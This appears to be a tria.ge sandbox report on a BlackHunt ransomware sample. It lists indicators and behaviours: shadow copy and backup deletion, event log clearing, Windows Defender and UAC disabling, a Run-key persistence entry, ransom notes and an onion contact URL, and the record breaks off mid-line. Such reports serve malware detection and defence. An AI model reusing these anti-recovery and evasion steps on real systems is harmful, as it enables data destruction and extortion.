Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:48
Static task
static1
Behavioral task
behavioral1
Sample
26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
Resource
win10v2004-20231215-en
General
-
Target
26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
-
Size
707KB
-
MD5
9297df899833e2582ec6aadd300cdaec
-
SHA1
6bf62166c0f4d1f1762f3942e858883f39afba1d
-
SHA256
26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3
-
SHA512
83f277c9cb113f1c8e56dea6ddd5e1f90c10832894bf81743f9d3797786bfe39424533bfe84c6194c35712fc41466778b07b93e7a3e7e4779f4262d019dea781
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza128yvnh:6uaTmkZJ+naie5OTamgEoKxLWFch
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8440 fsutil.exe 7844 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 5296 wevtutil.exe 5976 wevtutil.exe 6076 wevtutil.exe 3400 wevtutil.exe 5416 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7900 bcdedit.exe 5192 bcdedit.exe 7944 bcdedit.exe 8132 bcdedit.exe -
Renames multiple (3361) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1488 wbadmin.exe 7264 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\R: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\U: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\O: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\K: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\Z: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\M: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\A: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\S: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\B: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\T: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\I: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\P: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\J: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\L: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\G: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\H: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\V: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\Y: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\X: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\N: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\charsets.jar 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\ui-strings.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\ui-strings.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-sl\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x.cur 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\he-il\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected.svg 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\close.svg 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#BlackHunt_ReadMe.txt 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#BlackHunt_ReadMe.hta 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#BlackHunt_Private.key 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\default.jfc 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 17024 16656 WerFault.exe 289 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4632 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7768 vssadmin.exe 16396 vssadmin.exe 6992 vssadmin.exe 7684 vssadmin.exe 7724 vssadmin.exe 7732 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 16532 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 8288 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeRestorePrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeBackupPrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeTakeOwnershipPrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeAuditPrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeSecurityPrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeIncBasePriorityPrivilege 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Token: SeBackupPrivilege 5812 vssvc.exe Token: SeRestorePrivilege 5812 vssvc.exe Token: SeAuditPrivilege 5812 vssvc.exe Token: SeBackupPrivilege 8116 wbengine.exe Token: SeRestorePrivilege 8116 wbengine.exe Token: SeSecurityPrivilege 8116 wbengine.exe Token: SeSecurityPrivilege 5296 wevtutil.exe Token: SeBackupPrivilege 5296 wevtutil.exe Token: SeSecurityPrivilege 6076 wevtutil.exe Token: SeBackupPrivilege 6076 wevtutil.exe Token: SeSecurityPrivilege 5976 wevtutil.exe Token: SeBackupPrivilege 5976 wevtutil.exe Token: SeSecurityPrivilege 3400 wevtutil.exe Token: SeBackupPrivilege 3400 wevtutil.exe Token: SeSecurityPrivilege 5416 wevtutil.exe Token: SeBackupPrivilege 5416 wevtutil.exe Token: SeDebugPrivilege 16532 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 64 wrote to memory of 4968 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 89 PID 64 wrote to memory of 4968 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 89 PID 64 wrote to memory of 1512 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 91 PID 64 wrote to memory of 1512 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 91 PID 64 wrote to memory of 3404 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 93 PID 64 wrote to memory of 3404 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 93 PID 64 wrote to memory of 2988 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 95 PID 64 wrote to memory of 2988 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 95 PID 4968 wrote to memory of 1472 4968 cmd.exe 97 PID 4968 wrote to memory of 1472 4968 cmd.exe 97 PID 64 wrote to memory of 4772 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 99 PID 64 wrote to memory of 4772 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 99 PID 1512 wrote to memory of 4904 1512 cmd.exe 100 PID 1512 wrote to memory of 4904 1512 cmd.exe 100 PID 3404 wrote to memory of 4932 3404 cmd.exe 173 PID 3404 wrote to memory of 4932 3404 cmd.exe 173 PID 2988 wrote to memory of 5016 2988 cmd.exe 102 PID 2988 wrote to memory of 5016 2988 cmd.exe 102 PID 64 wrote to memory of 3176 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 103 PID 64 wrote to memory of 3176 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 103 PID 64 wrote to memory of 1404 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 106 PID 64 wrote to memory of 1404 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 106 PID 4772 wrote to memory of 4408 4772 cmd.exe 109 PID 4772 wrote to memory of 4408 4772 cmd.exe 109 PID 64 wrote to memory of 4744 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 107 PID 64 wrote to memory of 4744 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 107 PID 64 wrote to memory of 532 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 110 PID 64 wrote to memory of 532 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 110 PID 3176 wrote to memory of 5048 3176 cmd.exe 115 PID 3176 wrote to memory of 5048 3176 cmd.exe 115 PID 64 wrote to memory of 3052 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 196 PID 64 wrote to memory of 3052 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 196 PID 1404 wrote to memory 